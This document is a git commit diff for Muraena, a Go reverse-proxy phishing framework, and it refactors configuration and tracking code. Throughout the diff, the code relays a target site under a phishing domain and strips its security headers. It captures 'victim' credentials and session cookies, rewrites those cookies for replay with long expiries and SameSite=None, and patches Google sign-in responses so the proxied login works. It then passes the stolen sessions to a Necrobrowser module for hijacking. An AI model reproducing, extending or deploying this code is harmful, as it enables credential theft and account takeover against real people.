Config refactoring and code adjustments

This commit is contained in:
Ohpe 2024-03-06 21:57:03 +01:00
parent 33769c2c70
commit d51d8cd5ce
No known key found for this signature in database
21 changed files with 1131 additions and 408 deletions

View file

Before

Width:  |  Height:  |  Size: 49 MiB

After

Width:  |  Height:  |  Size: 49 MiB

Before After
Before After

View file

@ -36,7 +36,7 @@ type VictimCredential struct {
Time string `redis:"time"`
}
// VictimCookie: a victim has N cookies associated with its web session
// VictimCookie a victim has N cookies associated with its web session
// KEY scheme:
// victim:<ID>:cookiejar:<COOKIE_NAME>
type VictimCookie struct {

View file

@ -13,8 +13,6 @@ type Options struct {
ConfigFilePath *string
}
//var ErrInterrupt = errors.New("^C")
func ParseOptions() (Options, error) {
o := Options{
ConfigFilePath: flag.String("config", "", "Path to config file."),
@ -29,3 +27,14 @@ func ParseOptions() (Options, error) {
return o, nil
}
func GetDefaultOptions() Options {
return Options{
Verbose: &[]bool{false}[0],
Debug: &[]bool{false}[0],
Proxy: &[]bool{false}[0],
Version: &[]bool{false}[0],
NoColors: &[]bool{false}[0],
ConfigFilePath: &[]string{""}[0],
}
}

View file

@ -1,6 +1,7 @@
package proxy
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
@ -128,19 +129,11 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
// TRACKING
track := muraena.Tracker.TrackRequest(request)
// DROP
for _, drop := range sess.Config.Drop {
if request.URL.Path == drop.Path {
log.Debug("[Dropped] %s", request.URL.Path)
return
}
// If specified in the configuration, set the User-Agent header
if sess.Config.Transform.Request.UserAgent != "" {
request.Header.Set("User-Agent", sess.Config.Transform.Request.UserAgent)
}
//
// Garbage ..
//
// no garbage to remove in requests, for now ..
//
// HEADERS
//
@ -181,13 +174,55 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
}
}
// Track request cookies (if enabled)
if muraena.Session.Config.Tracking.TrackRequestCookies && track.IsValid() {
if len(request.Cookies()) > 0 {
// get victim:
victim, err := muraena.Tracker.GetVictim(track)
if err != nil {
log.Warning("%s", err)
} else {
// store cookies in the Victim object
for _, c := range request.Cookies() {
if c.Domain == "" {
c.Domain = request.Host
}
// remove any port from the cookie domain
c.Domain = strings.Split(c.Domain, ":")[0]
// make the cookie domain wildcard
subdomains := strings.Split(c.Domain, ".")
if len(subdomains) > 2 {
c.Domain = fmt.Sprintf("%s", strings.Join(subdomains[1:], "."))
} else {
c.Domain = fmt.Sprintf("%s", c.Domain)
}
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Path: "/",
HTTPOnly: false,
Secure: true,
Session: true,
SameSite: "None",
Expires: "2040-01-01 00:00:00 +0000 UTC",
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
}
}
}
// Add extra HTTP headers
for _, header := range sess.Config.Craft.Add.Request.Headers {
for _, header := range sess.Config.Transform.Request.Add.Headers {
request.Header.Set(header.Name, header.Value)
}
// Log line
lhead := fmt.Sprintf("[%s]", getSenderIP(request))
lhead := fmt.Sprintf("[%s]", GetSenderIP(request))
if sess.Config.Tracking.Enabled {
lhead = fmt.Sprintf("[%*s]%s", track.TrackerLength, track.ID, lhead)
}
@ -195,7 +230,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
l := fmt.Sprintf("%s [%s][%s%s%s]",
lhead,
Magenta(request.Method),
Magenta(sess.Config.Protocol), Yellow(request.Host), Cyan(request.URL.Path))
Magenta(sess.Config.Proxy.Protocol), Yellow(request.Host), Cyan(request.URL.Path))
if track.IsValid() {
log.Debug(l)
@ -204,7 +239,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
}
// Remove headers
for _, header := range sess.Config.Remove.Request.Headers {
for _, header := range sess.Config.Transform.Request.Remove.Headers {
request.Header.Del(header)
}
@ -213,7 +248,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
//
// If the requested resource extension is no relevant, skip body processing.
for _, extension := range sess.Config.SkipExtensions {
for _, extension := range sess.Config.Transform.Request.SkipExtensions {
if strings.HasSuffix(request.URL.Path, fmt.Sprintf(".%s", extension)) {
return
}
@ -237,14 +272,14 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
return nil
}
// getSenderIP returns the IP address of the client that sent the request.
// GetSenderIP returns the IP address of the client that sent the request.
// It checks the following headers in cascade order:
// - True-Client-IP
// - CF-Connecting-IP
// - X-Forwarded-For
// If none of the headers contain a valid IP, it falls back to RemoteAddr.
// TODO Update Watchdog to use this function
func getSenderIP(req *http.Request) string {
func GetSenderIP(req *http.Request) string {
// Define the headers to check in cascade order
headerNames := []string{"True-Client-IP", "CF-Connecting-IP", "X-Forwarded-For"}
@ -259,7 +294,7 @@ func getSenderIP(req *http.Request) string {
}
}
log.Debug("Sender IP not found in headers, falling back to RemoteAddr")
log.Verbose("Sender IP not found in headers, falling back to RemoteAddr")
// If none of the headers contain a valid IP, fall back to RemoteAddr
ipPort := req.RemoteAddr
@ -277,14 +312,14 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
sess.Config.Transform.Base64.Padding,
}
if response.Request.Header.Get(muraena.Tracker.Landing) != "" {
if response.Request.Header.Get(muraena.Tracker.LandingHeader) != "" {
response.StatusCode = 302
response.Header.Add(muraena.Tracker.Header, response.Request.Header.Get(muraena.Tracker.Header))
response.Header.Add("Set-Cookie",
fmt.Sprintf("%s=%s; Domain=%s; Path=/; Expires=Wed, 30 Aug 2029 00:00:00 GMT",
muraena.Session.Config.Tracking.Identifier, response.Request.Header.Get(muraena.Tracker.Header),
muraena.Session.Config.Tracking.Trace.Identifier, response.Request.Header.Get(muraena.Tracker.Header),
muraena.Session.Config.Proxy.Phishing))
response.Header.Set("Location", response.Request.Header.Get(muraena.Tracker.Landing))
response.Header.Set("Location", response.Request.Header.Get(muraena.Tracker.LandingHeader))
return
}
@ -296,113 +331,60 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
//
// DROP
dropRequest := false
for _, drop := range sess.Config.Drop {
if response.Request.URL.Path == drop.Path && drop.RedirectTo != "" {
// if the response was for the dropped request
response.StatusCode = 302
response.Header.Set("Location", drop.RedirectTo)
log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
dropRequest = true
break
}
}
if dropRequest {
return
}
// dropRequest := false
//
// TODO: is this still needed? We redirect Requests in the RequestProcessor
// for _, drop := range sess.Config.Redirects {
//
// if drop.RedirectTo == "" {
// continue
// }
//
// // if the drop is empty, it means that we want to drop all the requests
// // and we don't want to redirect them
// if drop.Hostname == "" && drop.Path == "" && drop.Query == "" {
// continue
// }
//
// if drop.Hostname != "" && response.Request.Host != drop.Hostname {
// continue
// }
//
// if drop.Path != "" && response.Request.URL.Path != drop.Path {
// continue
// }
//
// if drop.Query != "" && response.Request.URL.RawQuery != drop.Query {
// continue
// }
//
// // Invalid HTTP code fallback to 302
// if drop.HTTPStatusCode == 0 {
// drop.HTTPStatusCode = 302
// }
//
// response.StatusCode = drop.HTTPStatusCode
// response.Header.Set("Location", drop.RedirectTo)
// log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
// // dropRequest = true
// // break
// return
// }
// if dropRequest {
// return
// }
// Add extra HTTP headers
for _, header := range sess.Config.Craft.Add.Response.Headers {
for _, header := range sess.Config.Transform.Response.Add.Headers {
response.Header.Set(header.Name, header.Value)
}
// Media Type handling.
// Prevent processing of unwanted media types
mediaType := strings.ToLower(response.Header.Get("Content-Type"))
for _, skip := range sess.Config.Transform.SkipContentType {
skip = strings.ToLower(skip)
if mediaType == skip {
return
}
if strings.HasSuffix(skip, "/*") &&
strings.Split(mediaType, "/")[0] == strings.Split(skip, "/*")[0] {
return
}
}
//
// Trace
//
victim := muraena.Tracker.TrackResponse(response)
if victim != nil {
// before transforming headers like cookies, store the cookies in the CookieJar
for _, c := range response.Cookies() {
if c.Domain == "" {
c.Domain = response.Request.Host
}
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Expires: c.Expires.String(), // will be set by necrobrowser
Path: c.Path,
HTTPOnly: c.HttpOnly,
Secure: c.Secure,
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
if muraena.Session.Config.Tracking.Enabled && muraena.Session.Config.NecroBrowser.Enabled {
m, err := muraena.Session.Module("necrobrowser")
if err != nil {
log.Error("%s", err)
} else {
nb, ok := m.(*necrobrowser.Necrobrowser)
if ok {
getSession := false
for _, c := range muraena.Session.Config.Tracking.Urls.AuthSessionResponse {
if response.Request.URL.Path == c {
//log.Debug("Going to hijack response: %s (Victim: %+v)", response.Request.URL.Path, victim.ID)
getSession = true
break
}
}
if getSession {
// Pass credentials
creds, err := json.MarshalIndent(victim.Credentials, "", "\t")
if err != nil {
log.Warning(err.Error())
} else {
err := victim.GetVictimCookiejar()
if err != nil {
log.Error(err.Error())
} else {
go nb.Instrument(victim.ID, victim.Cookies, string(creds))
}
}
}
}
}
}
} else {
if len(response.Cookies()) > 0 {
log.Verbose("[TODO] Missing cookies to track: \n%s\n%+v", response.Request.URL, response.Cookies())
}
}
//
// HEADERS
//
// delete security headers
for _, header := range sess.Config.Remove.Response.Headers {
for _, header := range sess.Config.Transform.Response.Remove.Headers {
response.Header.Del(header)
}
@ -423,14 +405,157 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
response.Header["Set-Cookie"][k] = strings.Replace(response.Header["Set-Cookie"][k], domain, newDomain, 1)
}
log.Debug("Set-Cookie: %s", response.Header["Set-Cookie"][k])
// Further, if the SameSite attribute is set in the configuration, we need to patch the cookie
if sess.Config.Transform.Response.Cookie.SameSite != "" {
cookie := response.Header["Set-Cookie"][k]
// if cookie contains SameSite (case insensitive)
samesite := ""
if strings.Contains(strings.ToLower(cookie), "samesite") {
samesite = strings.Split(cookie, "SameSite=")[1]
samesite = strings.Split(samesite, ";")[0]
}
if samesite != "" {
cookie = strings.Replace(cookie, samesite, sess.Config.Transform.Response.Cookie.SameSite, 1)
} else {
cookie = cookie + ";SameSite=" + sess.Config.Transform.Response.Cookie.SameSite
}
response.Header["Set-Cookie"][k] = cookie
}
log.Verbose("Set-Cookie: %s", response.Header["Set-Cookie"][k])
}
} else if header == "Location" {
// TODO: Cleanup this mess
//
// if len(replacer.SubdomainMap) > 0 {
// for _, m := range replacer.SubdomainMap {
// if strings.Contains(response.Header.Get(header), m[1]) {
// // replace only the first occurrence starting from the left
// response.Header.Set(header, strings.Replace(response.Header.Get(header), m[1], m[0], -1))
// break
// }
// }
// }
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
} else {
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
}
}
}
// Media LandingType handling.
// Prevent processing of unwanted media types
mediaType := strings.ToLower(response.Header.Get("Content-Type"))
for _, skip := range sess.Config.Transform.Response.SkipContentType {
skip = strings.ToLower(skip)
if mediaType == skip {
return
}
if strings.HasSuffix(skip, "/*") &&
strings.Split(mediaType, "/")[0] == strings.Split(skip, "/*")[0] {
return
}
}
//
// Trace
//
if muraena.Session.Config.Tracking.Enabled {
trace := muraena.Tracker.TrackResponse(response)
if trace.IsValid() {
var err error
victim, err := muraena.Tracker.GetVictim(trace)
if err != nil {
log.Warning("Error: cannot retrieve Victim from tracker: %s", err)
}
// victim := muraena.Tracker.TrackResponse(response)
if victim != nil {
// before transforming headers like cookies, store the cookies in the CookieJar
for _, c := range response.Cookies() {
if c.Domain == "" {
c.Domain = response.Request.Host
}
c.Domain = strings.Replace(c.Domain, ":443", "", -1)
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Expires: c.Expires.String(), // will be set by necrobrowser
Path: c.Path,
HTTPOnly: c.HttpOnly,
Secure: c.Secure,
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
// Trace credentials
found, err := trace.ExtractCredentialsFromResponseHeaders(response)
if err != nil {
return errors.New(fmt.Sprintf("ExtractCredentialsFromResponseHeaders error: %s", err))
}
if found == true {
// muraena.Tracker.ShowVictims()
}
if muraena.Session.Config.Necrobrowser.Enabled {
m, err := muraena.Session.Module("necrobrowser")
if err != nil {
log.Error("%s", err)
} else {
nb, ok := m.(*necrobrowser.Necrobrowser)
if ok {
getSession := false
for _, c := range muraena.Session.Config.Necrobrowser.SensitiveLocations.AuthSessionResponse {
if response.Request.URL.Path == c {
// log.Debug("Going to hijack response: %s (Victim: %+v)", response.Request.URL.Path, victim.ID)
getSession = true
break
}
}
if getSession {
// Pass credentials
creds, err := json.MarshalIndent(victim.Credentials, "", "\t")
if err != nil {
log.Warning(err.Error())
} else {
err := victim.GetVictimCookiejar()
if err != nil {
log.Error(err.Error())
} else {
go nb.Instrument(victim.ID, victim.Cookies, string(creds))
}
}
}
}
}
}
} else {
if len(response.Cookies()) > 0 {
log.Verbose("[TODO] Missing cookies to track: \n%s\n%+v", response.Request.URL, response.Cookies())
}
}
}
}
//
// BODY
//
@ -444,12 +569,32 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
// process body and pack again
newBody := replacer.Transform(string(responseBuffer), false, base64)
//
// Ugly Google patch
//
// If request URL contains: AccountsSignInUi/data/batchexecute
// the go for another round of patches
if strings.Contains(response.Request.URL.Path, "AccountsSignInUi/data/batchexecute") {
// if body contains the phishing domain
if strings.Contains(newBody, muraena.Session.Config.Proxy.Phishing) {
// if body contains )]}'\n\n then patch it
if strings.HasPrefix(newBody, ")]}'\n\n") {
// fmt.Println("newBody: ", newBody)
newBody = patchGoogleStructs(newBody)
// fmt.Println("updated newBody: ", newBody)
}
}
}
err = modResponse.Encode([]byte(newBody))
if err != nil {
log.Info("Error processing the body: %+v", err)
return err
}
return nil
}
@ -487,10 +632,25 @@ func (init *MuraenaProxyInit) Spawn() *MuraenaProxy {
director := proxy.Director
proxy.Director = func(r *http.Request) {
// If request matches the redirect list, redirect it without processing
if redirect := muraena.getHTTPRedirect(r); redirect != nil {
// Retrieve the http.ResponseWriter from the context
if rw, ok := r.Context().Value(0).(http.ResponseWriter); ok {
http.Redirect(rw, r, redirect.RedirectTo, redirect.HTTPStatusCode)
} else {
log.Error("Failed to retrieve the http.ResponseWriter from the context")
}
return
}
if err = muraena.RequestProcessor(r); err != nil {
log.Error(err.Error())
return
}
// Send the request to the target
director(r)
}
proxy.ModifyResponse = muraena.ResponseProcessor
@ -510,6 +670,37 @@ func (init *MuraenaProxyInit) Spawn() *MuraenaProxy {
return muraena
}
func (muraena *MuraenaProxy) getHTTPRedirect(request *http.Request) *session.Redirect {
for _, drop := range muraena.Session.Config.Redirects {
// Skip if Hostname is set and the request Hostname is different from the expected one
if drop.Hostname != "" && request.Host != drop.Hostname {
continue
}
// Skip if Path is set and the request Path is different from the expected one
if drop.Path != "" && request.URL.Path != drop.Path {
continue
}
// Skip if Query is set and the request Query is different from the expected one
if drop.Query != "" && request.URL.RawQuery != drop.Query {
continue
}
log.Info("[Dropped] %s", request.URL.String())
// Invalid HTTP code fallback to 302
if drop.HTTPStatusCode == 0 {
drop.HTTPStatusCode = 302
}
return &drop
}
return nil
}
func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Request) {
var destination string
@ -521,21 +712,34 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
ss, ok := m.(*statichttp.StaticHTTP)
if ok {
destination = ss.MakeDestinationURL(request.URL)
destination = ss.GetNewDestination(request.URL)
}
}
if destination == "" {
// CustomContent Subdomain Mapping
subs := strings.Split(request.Host, st.Replacer.Phishing)
if len(subs) > 1 {
sub := strings.Replace(subs[0], ".", "", -1)
for _, m := range st.Session.Config.Origins.SubdomainMap {
if m[0] == sub {
request.Host = fmt.Sprintf("%s.%s", m[1], st.Replacer.Phishing)
break
}
}
}
if strings.Contains(request.Host, st.Replacer.getCustomWildCardSeparator()) {
request.Host = st.Replacer.PatchComposedWildcardURL(request.Host)
}
if strings.HasPrefix(request.Host, st.Replacer.ExternalOriginPrefix) { //external domain mapping
if strings.HasPrefix(request.Host, st.Replacer.ExternalOriginPrefix) { // external domain mapping
for domain, subMapping := range st.Replacer.GetOrigins() {
// even if the resource is aa.bb.cc.dom.tld, the mapping is always one level as in www--2.phishing.tld.
// This is important since wildcard SSL certs do not handle N levels of nesting
if subMapping == strings.Split(request.Host, ".")[0] {
destination = fmt.Sprintf("%s%s", st.Session.Config.Protocol,
destination = fmt.Sprintf("%s%s", st.Session.Config.Proxy.Protocol,
strings.Replace(request.Host,
fmt.Sprintf("%s.%s", subMapping, st.Replacer.Phishing),
domain, -1))
@ -543,7 +747,7 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
}
}
} else {
destination = fmt.Sprintf("%s%s", st.Session.Config.Protocol,
destination = fmt.Sprintf("%s%s", st.Session.Config.Proxy.Protocol,
strings.Replace(request.Host, st.Replacer.Phishing, st.Replacer.Target, -1))
}
}
@ -594,3 +798,47 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
// has been slightly modified in the ServeHTTP method:
muraenaProxy.ReverseProxy.ServeHTTP(response, request)
}
// patchGoogleStructs is a temporary workaround for the Google Structs issue.
func patchGoogleStructs(input string) string {
var builder strings.Builder
// Splitting the input into sections and processing
scanner := bufio.NewScanner(strings.NewReader(input))
for scanner.Scan() {
line := scanner.Text()
// Check if the line is a number (size indicator)
if size, err := strconv.Atoi(line); err == nil {
// Read the next line (message content)
if scanner.Scan() {
message := scanner.Text()
// Calculate the new size including the newline characters
newSize := len(message) + 2 // +2 for the two newline characters
// Update the size if it's different
if newSize != size+1 {
fmt.Fprintln(&builder, newSize)
} else {
fmt.Fprintln(&builder, size)
}
// Print the message content
fmt.Fprintln(&builder, message)
} else {
// fmt.Fprintln(&builder, "Error: Expected message content after size indicator.")
return builder.String()
}
} else {
// Print non-size indicator lines as is
fmt.Fprintln(&builder, line)
}
}
if err := scanner.Err(); err != nil {
fmt.Fprintln(&builder, "Error reading input:", err)
}
return builder.String()
}

View file

@ -27,6 +27,7 @@ type Replacer struct {
ExternalOriginPrefix string
Origins map[string]string
WildcardMapping map[string]string
SubdomainMap [][]string
CustomResponseTransformations [][]string
ForwardReplacements []string `json:"-"`
ForwardWildcardReplacements []string `json:"-"`
@ -39,10 +40,20 @@ type Replacer struct {
mu sync.RWMutex
}
// GetSessionFileName returns the session file name
// It generates the value from the Target domain, adding google.com.session.json at the end
func (r *Replacer) GetSessionFileName() string {
return fmt.Sprintf("%s.session.json", r.Target)
}
// Init initializes the Replacer struct.
// If session.json is found, it loads the data from it.
// Otherwise, it creates a new Replacer struct.
func (r *Replacer) Init(s session.Session) error {
if r.Target == "" {
r.Target = s.Config.Proxy.Target
}
err := r.Load()
if err != nil {
log.Debug("Error loading replacer: %s", err)
@ -58,17 +69,18 @@ func (r *Replacer) Init(s session.Session) error {
}
if r.ExternalOriginPrefix == "" {
r.ExternalOriginPrefix = s.Config.Crawler.ExternalOriginPrefix
r.ExternalOriginPrefix = s.Config.Origins.ExternalOriginPrefix
}
r.SetExternalOrigins(s.Config.Crawler.ExternalOrigins)
r.SetOrigins(s.Config.Crawler.OriginsMapping)
r.SubdomainMap = s.Config.Origins.SubdomainMap
r.SetExternalOrigins(s.Config.Origins.ExternalOrigins)
r.SetOrigins(s.Config.Origins.OriginsMapping)
if err = r.DomainMapping(); err != nil {
return err
}
r.SetCustomResponseTransformations(s.Config.Transform.Response.Custom)
r.SetCustomResponseTransformations(s.Config.Transform.Response.CustomContent)
r.MakeReplacements()
// Save the replacer
@ -327,7 +339,9 @@ func contains(slice []string, s string) bool {
func (r *Replacer) Save() error {
r.mu.Lock()
defer r.mu.Unlock()
return saveToJSON(ReplaceFile, r)
return saveToJSON(r.GetSessionFileName(), r)
// return saveToJSON(ReplaceFile, r)
}
// saveToJSON saves the Replacer struct to a file as JSON.
@ -341,7 +355,8 @@ func saveToJSON(filename string, replacer *Replacer) error {
// Load loads the Replacer data from a JSON file.
func (r *Replacer) Load() error {
rep, err := loadFromJSON(ReplaceFile)
rep, err := loadFromJSON(r.GetSessionFileName())
// rep, err := loadFromJSON(ReplaceFile)
if err != nil {
return err
}

View file

@ -31,7 +31,15 @@ type muraenaServer struct {
NetListener net.Listener
}
func (server *tlsServer) serveTLS() (err error) {
func (server *tlsServer) serveTLS(sslkeylog string) (err error) {
// Panic recovery
defer func() {
if err := recover(); err != nil {
log.Warning("Recovered from panic: %s", err)
}
}()
server.Config.Certificates[0], err = tls.X509KeyPair([]byte(server.Cert), []byte(server.Key))
if err != nil {
return err
@ -45,6 +53,19 @@ func (server *tlsServer) serveTLS() (err error) {
server.Config.ClientCAs = certpool
}
if sslkeylog != "" {
// Open the file in append mode, create it if it doesn't exist, with write-only permissions
f, err := os.OpenFile(sslkeylog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
// defer f.Close() // Ensure file is closed when function exits
if err != nil {
log.Error(err.Error())
} else {
_, _ = fmt.Fprintf(f, "# SSL/TLS secrets log file, generated by Muraena\n")
server.Config.KeyLogWriter = f
}
}
tlsListener := tls.NewListener(server.NetListener, server.Config)
return server.Serve(tlsListener)
}
@ -60,7 +81,7 @@ func Run(sess *session.Session) {
}
//
// Start the reverse proxy
// start the reverse proxy
//
http.HandleFunc("/", func(response http.ResponseWriter, request *http.Request) {
@ -135,7 +156,12 @@ func Run(sess *session.Session) {
}
server := &http.Server{Handler: RedirectToHTTPS(sess.Config.Proxy.Port)}
go server.Serve(newNetListener)
go func() {
err := server.Serve(newNetListener)
if err != nil {
log.Fatal("Error binding Muraena on HTTP: %s", err)
}
}()
}
// Attach TLS configurations to muraena server
@ -148,7 +174,8 @@ func Run(sess *session.Session) {
Config: sess.GetTLSClientConfig(),
}
if err := tlsServer.serveTLS(); core.IsError(err) {
if err := tlsServer.serveTLS(cTLS.SSLKeyLog); core.IsError(err) {
log.Fatal("Error binding Muraena on HTTPS: %s", err)
}
}

View file

@ -42,8 +42,16 @@ type Base64 struct {
// TODO: the b64 can be set into the Replacer struct
func (r *Replacer) Transform(input string, forward bool, b64 Base64, repetitions ...int) (result string) {
source := strings.TrimSpace(input)
if source == "" {
// Panic recovery
defer func() {
if err := recover(); err != nil {
log.Warning("Recovered from panic: %s", err)
}
}()
// source := strings.TrimSpace(input)
source := input
if strings.TrimSpace(input) == "" {
return source
}
@ -281,7 +289,7 @@ func (r *Replacer) PatchComposedWildcardURL(URL string) (result string) {
if strings.Contains(result, r.Phishing+"/") {
path = "/" + strings.Split(result, r.Phishing+"/")[1]
}
//wildcard = strings.TrimSuffix(wildcard, fmt.Sprintf(".%s", r.Phishing))
// wildcard = strings.TrimSuffix(wildcard, fmt.Sprintf(".%s", r.Phishing))
domain := fmt.Sprintf("%s.%s", subdomain, r.patchWildcard(wildcard))
log.Info("Wildcard to patch: %s (%s)", tui.Bold(tui.Red(result)), tui.Green(domain))
@ -298,10 +306,10 @@ func (r *Replacer) PatchComposedWildcardURL(URL string) (result string) {
return
}
//origins := r.GetOrigins()
//if sub, ok := origins[domain]; ok {
// origins := r.GetOrigins()
// if sub, ok := origins[domain]; ok {
// log.Info("%s is mapped to %s", tui.Bold(tui.Red(domain)), tui.Green(sub))
//}
// }
if err := r.Save(); err != nil {
log.Error("Error saving replacer: %s", err)
@ -332,7 +340,7 @@ func transformBase64(input string, b64 Base64, decode bool, padding rune) (outpu
}
}
} else {
//encode
// encode
return base64Encode(input, padding), base64Found, padding
}
}
@ -447,7 +455,7 @@ func (r *Replacer) patchWildcardList(rep []string) (prep []string) {
wildcard := strings.Split(s, CustomWildcardSeparator)[1]
wildcard = strings.Split(wildcard, "/")[0]
//domain := r.patchWildcard(s)
// domain := r.patchWildcard(s)
domain := fmt.Sprintf("%s.%s", subdomain, r.patchWildcard(wildcard))
if domain != "" {
prep = append(prep, domain)
@ -493,6 +501,14 @@ func (r *Replacer) MakeReplacements() {
r.SetForwardReplacements([]string{})
r.SetForwardReplacements(append(r.ForwardReplacements, []string{r.Phishing, r.Target}...))
// Add the SubdomainMap to the forward replacements
for _, sub := range r.SubdomainMap {
from := fmt.Sprintf("%s.%s", sub, r.Phishing)
to := fmt.Sprintf("%s.%s", sub, r.Target)
rep := []string{from, to}
r.SetForwardReplacements(append(r.ForwardReplacements, rep...))
}
log.Verbose("[Forward | Origins]: %d", len(origins))
count := len(r.ForwardReplacements)
for extOrigin, subMapping := range origins { // changes resource-1.phishing.
@ -530,6 +546,14 @@ func (r *Replacer) MakeReplacements() {
r.SetBackwardReplacements([]string{})
r.SetBackwardReplacements(append(r.BackwardReplacements, []string{r.Target, r.Phishing}...))
// Add the SubdomainMap to the backward replacements
for _, sub := range r.SubdomainMap {
from := fmt.Sprintf("%s.%s", sub, r.Target)
to := fmt.Sprintf("%s.%s", sub, r.Phishing)
rep := []string{from, to}
r.SetBackwardReplacements(append(r.BackwardReplacements, rep...))
}
count = 0
for include, subMapping := range origins {
@ -562,10 +586,10 @@ func (r *Replacer) MakeReplacements() {
// These should be done as Final replacements
r.SetLastBackwardReplacements([]string{})
// Custom HTTP response replacements
// CustomContent HTTP response replacements
for _, tr := range r.CustomResponseTransformations {
r.SetLastBackwardReplacements(append(r.LastBackwardReplacements, tr...))
log.Verbose("[Custom Replacements] %+v", tr)
log.Verbose("[CustomContent Replacements] %+v", tr)
}
r.SetLastBackwardReplacements(append(r.BackwardReplacements, r.LastBackwardReplacements...))
@ -574,7 +598,7 @@ func (r *Replacer) MakeReplacements() {
func (r *Replacer) DomainMapping() (err error) {
baseDom := r.Target
//log.Debug("Proxy destination: %s", tui.Bold(tui.Green("*."+baseDom)))
// log.Debug("Proxy destination: %s", tui.Bold(tui.Green("*."+baseDom)))
origins := make(map[string]string)
r.WildcardMapping = make(map[string]string)
@ -603,14 +627,14 @@ func (r *Replacer) DomainMapping() (err error) {
o := fmt.Sprintf("%s%d", prefix, wildcards)
r.SetWildcardDomain(o)
r.SetWildcardMapping(domain, o)
//log.Debug(fmt.Sprintf("*.%s=%s", domain, o))
// log.Debug(fmt.Sprintf("*.%s=%s", domain, o))
} else {
count++
// Extra domains or nested subdomains
o := fmt.Sprintf("%s%d", r.ExternalOriginPrefix, count)
origins[domain] = o
//log.Debug(fmt.Sprintf("%s=%s", domain, o))
// log.Debug(fmt.Sprintf("%s=%s", domain, o))
}
}
@ -620,6 +644,6 @@ func (r *Replacer) DomainMapping() (err error) {
}
r.SetOrigins(origins)
//log.Verbose("Processed %d domains to transform, %d are wildcards", count, wildcards)
// log.Verbose("Processed %d domains to transform, %d are wildcards", count, wildcards)
return
}

View file

@ -13,7 +13,6 @@ import (
)
func main() {
sess, err := session.New()
if err != nil {
fmt.Println(err)

View file

@ -72,18 +72,18 @@ func (module *Crawler) Prompt() {
// Load configures the module by initializing its main structure and variables
func Load(s *session.Session) (m *Crawler, err error) {
config := s.Config.Crawler
config := s.Config
m = &Crawler{
SessionModule: session.NewSessionModule(Name, s),
Enabled: config.Enabled,
UpTo: config.UpTo,
Depth: config.Depth,
Enabled: config.Crawler.Enabled,
UpTo: config.Crawler.UpTo,
Depth: config.Crawler.Depth,
}
rgxURLS = xurls.Strict()
// Armor domains
config.ExternalOrigins = proxy.ArmorDomain(config.ExternalOrigins)
config.Origins.ExternalOrigins = proxy.ArmorDomain(config.Origins.ExternalOrigins)
if !m.Enabled {
m.Debug("is disabled")
return
@ -91,7 +91,7 @@ func Load(s *session.Session) (m *Crawler, err error) {
m.explore()
m.SimplifyDomains()
config.ExternalOrigins = m.Domains
config.Origins.ExternalOrigins = m.Domains
m.Info("Domain crawling stats:")
err = s.UpdateConfiguration(&m.Domains)
@ -102,7 +102,7 @@ func Load(s *session.Session) (m *Crawler, err error) {
func (module *Crawler) explore() {
waitGroup.Wait()
// Custom client
// CustomContent client
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
@ -174,7 +174,7 @@ func (module *Crawler) explore() {
module.Info("Starting exploration of %s (crawlDepth:%d crawlMaxReq: %d), just a few seconds...",
config.Proxy.Target, module.Depth, module.UpTo)
dest := fmt.Sprintf("%s%s", config.Protocol, config.Proxy.Target)
dest := fmt.Sprintf("%s%s", config.Proxy.Protocol, config.Proxy.Target)
err := c.Visit(dest)
if err != nil {
module.Info("Exploration error visiting %s: %s", dest, tui.Red(err.Error()))

View file

@ -84,7 +84,7 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
m = &Necrobrowser{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.NecroBrowser.Enabled,
Enabled: s.Config.Necrobrowser.Enabled,
}
if !m.Enabled {
@ -92,7 +92,7 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
return
}
config := s.Config.NecroBrowser
config := s.Config.Necrobrowser
m.Endpoint = config.Endpoint
m.Profile = config.Profile
@ -107,19 +107,19 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
// spawn a go routine that checks all the victims cookie jars every N seconds
// to see if we have any sessions ready to be instrumented
if s.Config.NecroBrowser.Enabled {
if s.Config.Necrobrowser.Enabled {
m.Info("enabled")
go m.CheckSessions()
m.Info("trigger delay every %d seconds", s.Config.NecroBrowser.Trigger.Delay)
m.Info("trigger delay every %d seconds", s.Config.Necrobrowser.Trigger.Delay)
}
return
}
func (module *Necrobrowser) CheckSessions() {
triggerType := module.Session.Config.NecroBrowser.Trigger.Type
triggerDelay := module.Session.Config.NecroBrowser.Trigger.Delay
triggerType := module.Session.Config.Necrobrowser.Trigger.Type
triggerDelay := module.Session.Config.Necrobrowser.Trigger.Delay
for {
switch triggerType {
@ -136,7 +136,7 @@ func (module *Necrobrowser) CheckSessions() {
}
